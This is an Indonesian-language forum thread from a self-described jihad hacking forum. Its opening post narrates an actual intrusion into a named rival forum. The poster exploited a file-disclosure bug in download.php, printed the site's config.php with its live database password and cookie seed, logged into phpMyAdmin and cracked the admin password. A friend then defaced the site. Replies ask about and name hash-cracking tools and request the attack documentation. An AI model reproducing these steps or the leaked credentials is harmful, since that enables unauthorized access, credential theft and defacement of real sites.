Soldier Of Allah - Indonesia
Would you like to react to this message? Create an account in a few clicks or log in to continue.


Soldier Of Allah adalah Team Pembela Islam
 
IndeksPortalLatest imagesPencarianPendaftaranLogin

 

 [POC] RFD (Remote File Disclousure)

Go down 
+6
Spyw4re
Gariz_Keraz
abbsolut_sakit_jiwa
SyNTaX eRRoR
Neo|g4br1eL
cyberkalashnikov
10 posters
PengirimMessage
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySat Jan 09, 2010 11:14 pm

In The Name Of Allah


ana gak ingin apa-apa dari posting ana ini..
cuma ingin ridho Allah Ta'ala...

sebelumnya ana minta afwan kepada soa members yang jadi bagian staf cyberdos...
Ana tidak ada dendam dengan sapa pun disana...Ana minta afwan dengan sebesar-besarnya..

kebetulan cyberdos sudah tidak bisa di akses..
maka ana akan coba jabarkan poc yang ana buat ketika coba masuk ke database n web nya cyberdos...

Bismillah...

pada awalnya hanya ingin baca thread n lagi cari link download beberapa software yang ingin ana cari...
setelah coba obrak abrik thread disana..
ana coba masuk ke menu download yang tersedia di web nya cyberdos...
http://cyberdos.org/download.php

w00t!!!
ana lihat ada error...

ERROR : download file NOT SPECIFIED . USE force-download.php?file=filepath


ana langsung kaget...
ada RFD ne...
coba ana buat spekulasi
http://cyberdos.org/download.php?file=index.php

W00t!!!
ana diminta untuk download file index.php
ternyata server cyberdos mengizinkan ana melihat langsung script client side nya...index.php!!!

aksi berikutnya...
setelah yakin kalau ini benar vulnarable RFD..
menuju url..
http://cyberdos.org/download.php?file=config.php

w00t!!!
config.php nya telah di dapat...

Code:
<?php

$db_type = 'mysql';
$db_host = 'localhost';
$db_name = 'peace_cyberdos';
$db_username = 'peace_cyberdos';
$db_password = '30032006';
$db_prefix = 'punbb_';
$p_connect = false;

$cookie_name = 'punbb_cookie';
$cookie_domain = '';
$cookie_path = '/';
$cookie_secure = 0;
$cookie_seed = 'bbc64b7deec4260f';

$BoardFounder = 'admin@cyberdos.org';
$TimeOut = '300'; // Time in seconds before the authorization key times out
define('PUN', 1);


terlihat jelas disana...
$db_username = 'peace_cyberdos';
$db_password = '30032006';

username database => peace_cyberdos
password => 30032006

w00t!!!
skarang tinggal masuk ke cpanel...
http://cyberdos.org:2082

Sad

hasilnya not found..

berikutnya coba masuk ke phpmyadminnya...

http://cyberdos.org/phpmyadmin

setelah masukkan username n password yang di dapat...
bingo!!!!
mission complate...
database has been owned....

tinggal cari pass superadmin...
crack..
wew..
ternyata weak password..

tinggal login di sebagai admin...
cyberdos has been owned...

yang eksekusi n deface teman ana...
ana cuma founder bugs aja...

kebetulan kmaren kelupa mau buat dokumentasi ketika proses attacking...
maka ana sertakan dokumentasi dari bugs yang sama persis dari kk xshadow...
silahkan download akhi fillah smua..

Link download


Jazakallah khair
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
Neo|g4br1eL




Jumlah posting : 86
Join date : 07.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySun Jan 10, 2010 12:57 am

Untuk masalah cbd, ane tidak bisa berkata apapun karena ane tidak ada urusannya Very Happy
tp untuk berbagi ilmu, ane dengan sangat berterimakasih menerima dg snang hati,hehe.. Very Happy mungkin dg menjabarkan bug dan celah cbd, kita dapat saling belajar untuk membenahinya menjadi lebih baik.. No system perfectly safe,, Smile
Kembali Ke Atas Go down
Neo|g4br1eL




Jumlah posting : 86
Join date : 07.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySun Jan 10, 2010 1:02 am

Btw hash database phpbb crackingnya pke apa bro?
Kembali Ke Atas Go down
Tamu
Tamu




[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySun Jan 10, 2010 11:18 am

Alhamdulillah , Ilmu lagi nih , syukron akhi
Kembali Ke Atas Go down
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySun Jan 10, 2010 12:03 pm

Neo|g4br1eL wrote:
Btw hash database phpbb crackingnya pke apa bro?

kmaren ana coba di passcracking.com , kerinci.net n channel passcrack di irc...
n kalau tetap gak bisa ana test pake tools devilzc0decrack dari om gunslinger..

strong tools buat pass cracking..
hhe...
tapi tergantung dictionary nya juga...
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
SyNTaX eRRoR

SyNTaX eRRoR


Jumlah posting : 28
Join date : 12.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyThu Jan 14, 2010 2:17 am

syukron akhi
Kembali Ke Atas Go down
abbsolut_sakit_jiwa

abbsolut_sakit_jiwa


Jumlah posting : 11
Join date : 12.01.10
Age : 38
Lokasi : HeLL

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyThu Jan 14, 2010 9:33 am

izin sedot gan lol!
Kembali Ke Atas Go down
Gariz_Keraz

Gariz_Keraz


Jumlah posting : 120
Join date : 12.01.10
Age : 29
Lokasi : Mojokerto

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyThu Jan 14, 2010 11:03 pm

Ane ijin sedot dulu y...
Kembali Ke Atas Go down
http://www.afz-devils.co.cc
Spyw4re

Spyw4re


Jumlah posting : 3
Join date : 29.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyFri Jan 29, 2010 2:04 pm

wow..
db cdos yah..
mantep2..
Kembali Ke Atas Go down
Neo|g4br1eL




Jumlah posting : 86
Join date : 07.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySat Jan 30, 2010 1:53 am

Link mati tuh bro Very Happy
Kembali Ke Atas Go down
newbie_043

newbie_043


Jumlah posting : 42
Join date : 11.01.10

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySat Jan 30, 2010 7:37 am

iya tuh dah mati...
Kembali Ke Atas Go down
Gariz_Keraz

Gariz_Keraz


Jumlah posting : 120
Join date : 12.01.10
Age : 29
Lokasi : Mojokerto

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySat Jan 30, 2010 8:16 am

Linknya Mati...... Arrow
Kembali Ke Atas Go down
http://www.afz-devils.co.cc
cyberkalashnikov

cyberkalashnikov


Jumlah posting : 118
Join date : 07.01.10
Lokasi : /bin/bash

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptySun Jan 31, 2010 12:06 am

Afwan akhi...
Link sudah di perbarui..

Download
Kembali Ke Atas Go down
http://www.cyberkalashnikov.co.cc
abu adam

abu adam


Jumlah posting : 43
Join date : 07.04.10
Lokasi : Diatas Bumi Dibawah Langit

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyMon Apr 19, 2010 12:39 am

[POC] RFD (Remote File Disclousure) Bismib

Izin sedot dulu ya akhi

barokallohu fiikum
Kembali Ke Atas Go down
http://jihadbukankenistaan.com/
rascal_21

rascal_21


Jumlah posting : 68
Join date : 29.04.10
Age : 34
Lokasi : Cyber Jihad

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyFri Jun 18, 2010 8:01 am

cyberkalashnikov wrote:
Afwan akhi...
Link sudah di perbarui..

Download

izin download akhi... Smile
Kembali Ke Atas Go down
http://albantani-crew.friendhood.net/
scr34mz

scr34mz


Jumlah posting : 25
Join date : 28.07.10
Age : 31
Lokasi : Bandung

[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) EmptyWed Jul 28, 2010 7:36 am

izin sedot kk Very Happy
Kembali Ke Atas Go down
Sponsored content





[POC] RFD (Remote File Disclousure) Empty
PostSubyek: Re: [POC] RFD (Remote File Disclousure)   [POC] RFD (Remote File Disclousure) Empty

Kembali Ke Atas Go down
 
[POC] RFD (Remote File Disclousure)
Kembali Ke Atas 
Halaman 1 dari 1
 Similar topics
-
» RFI (Remote File Include)
» Menyembunyikan File dalam Jpg (image)

Permissions in this forum:Anda tidak dapat menjawab topik
Soldier Of Allah - Indonesia :: Jihad Area :: Tutorial-
Navigasi: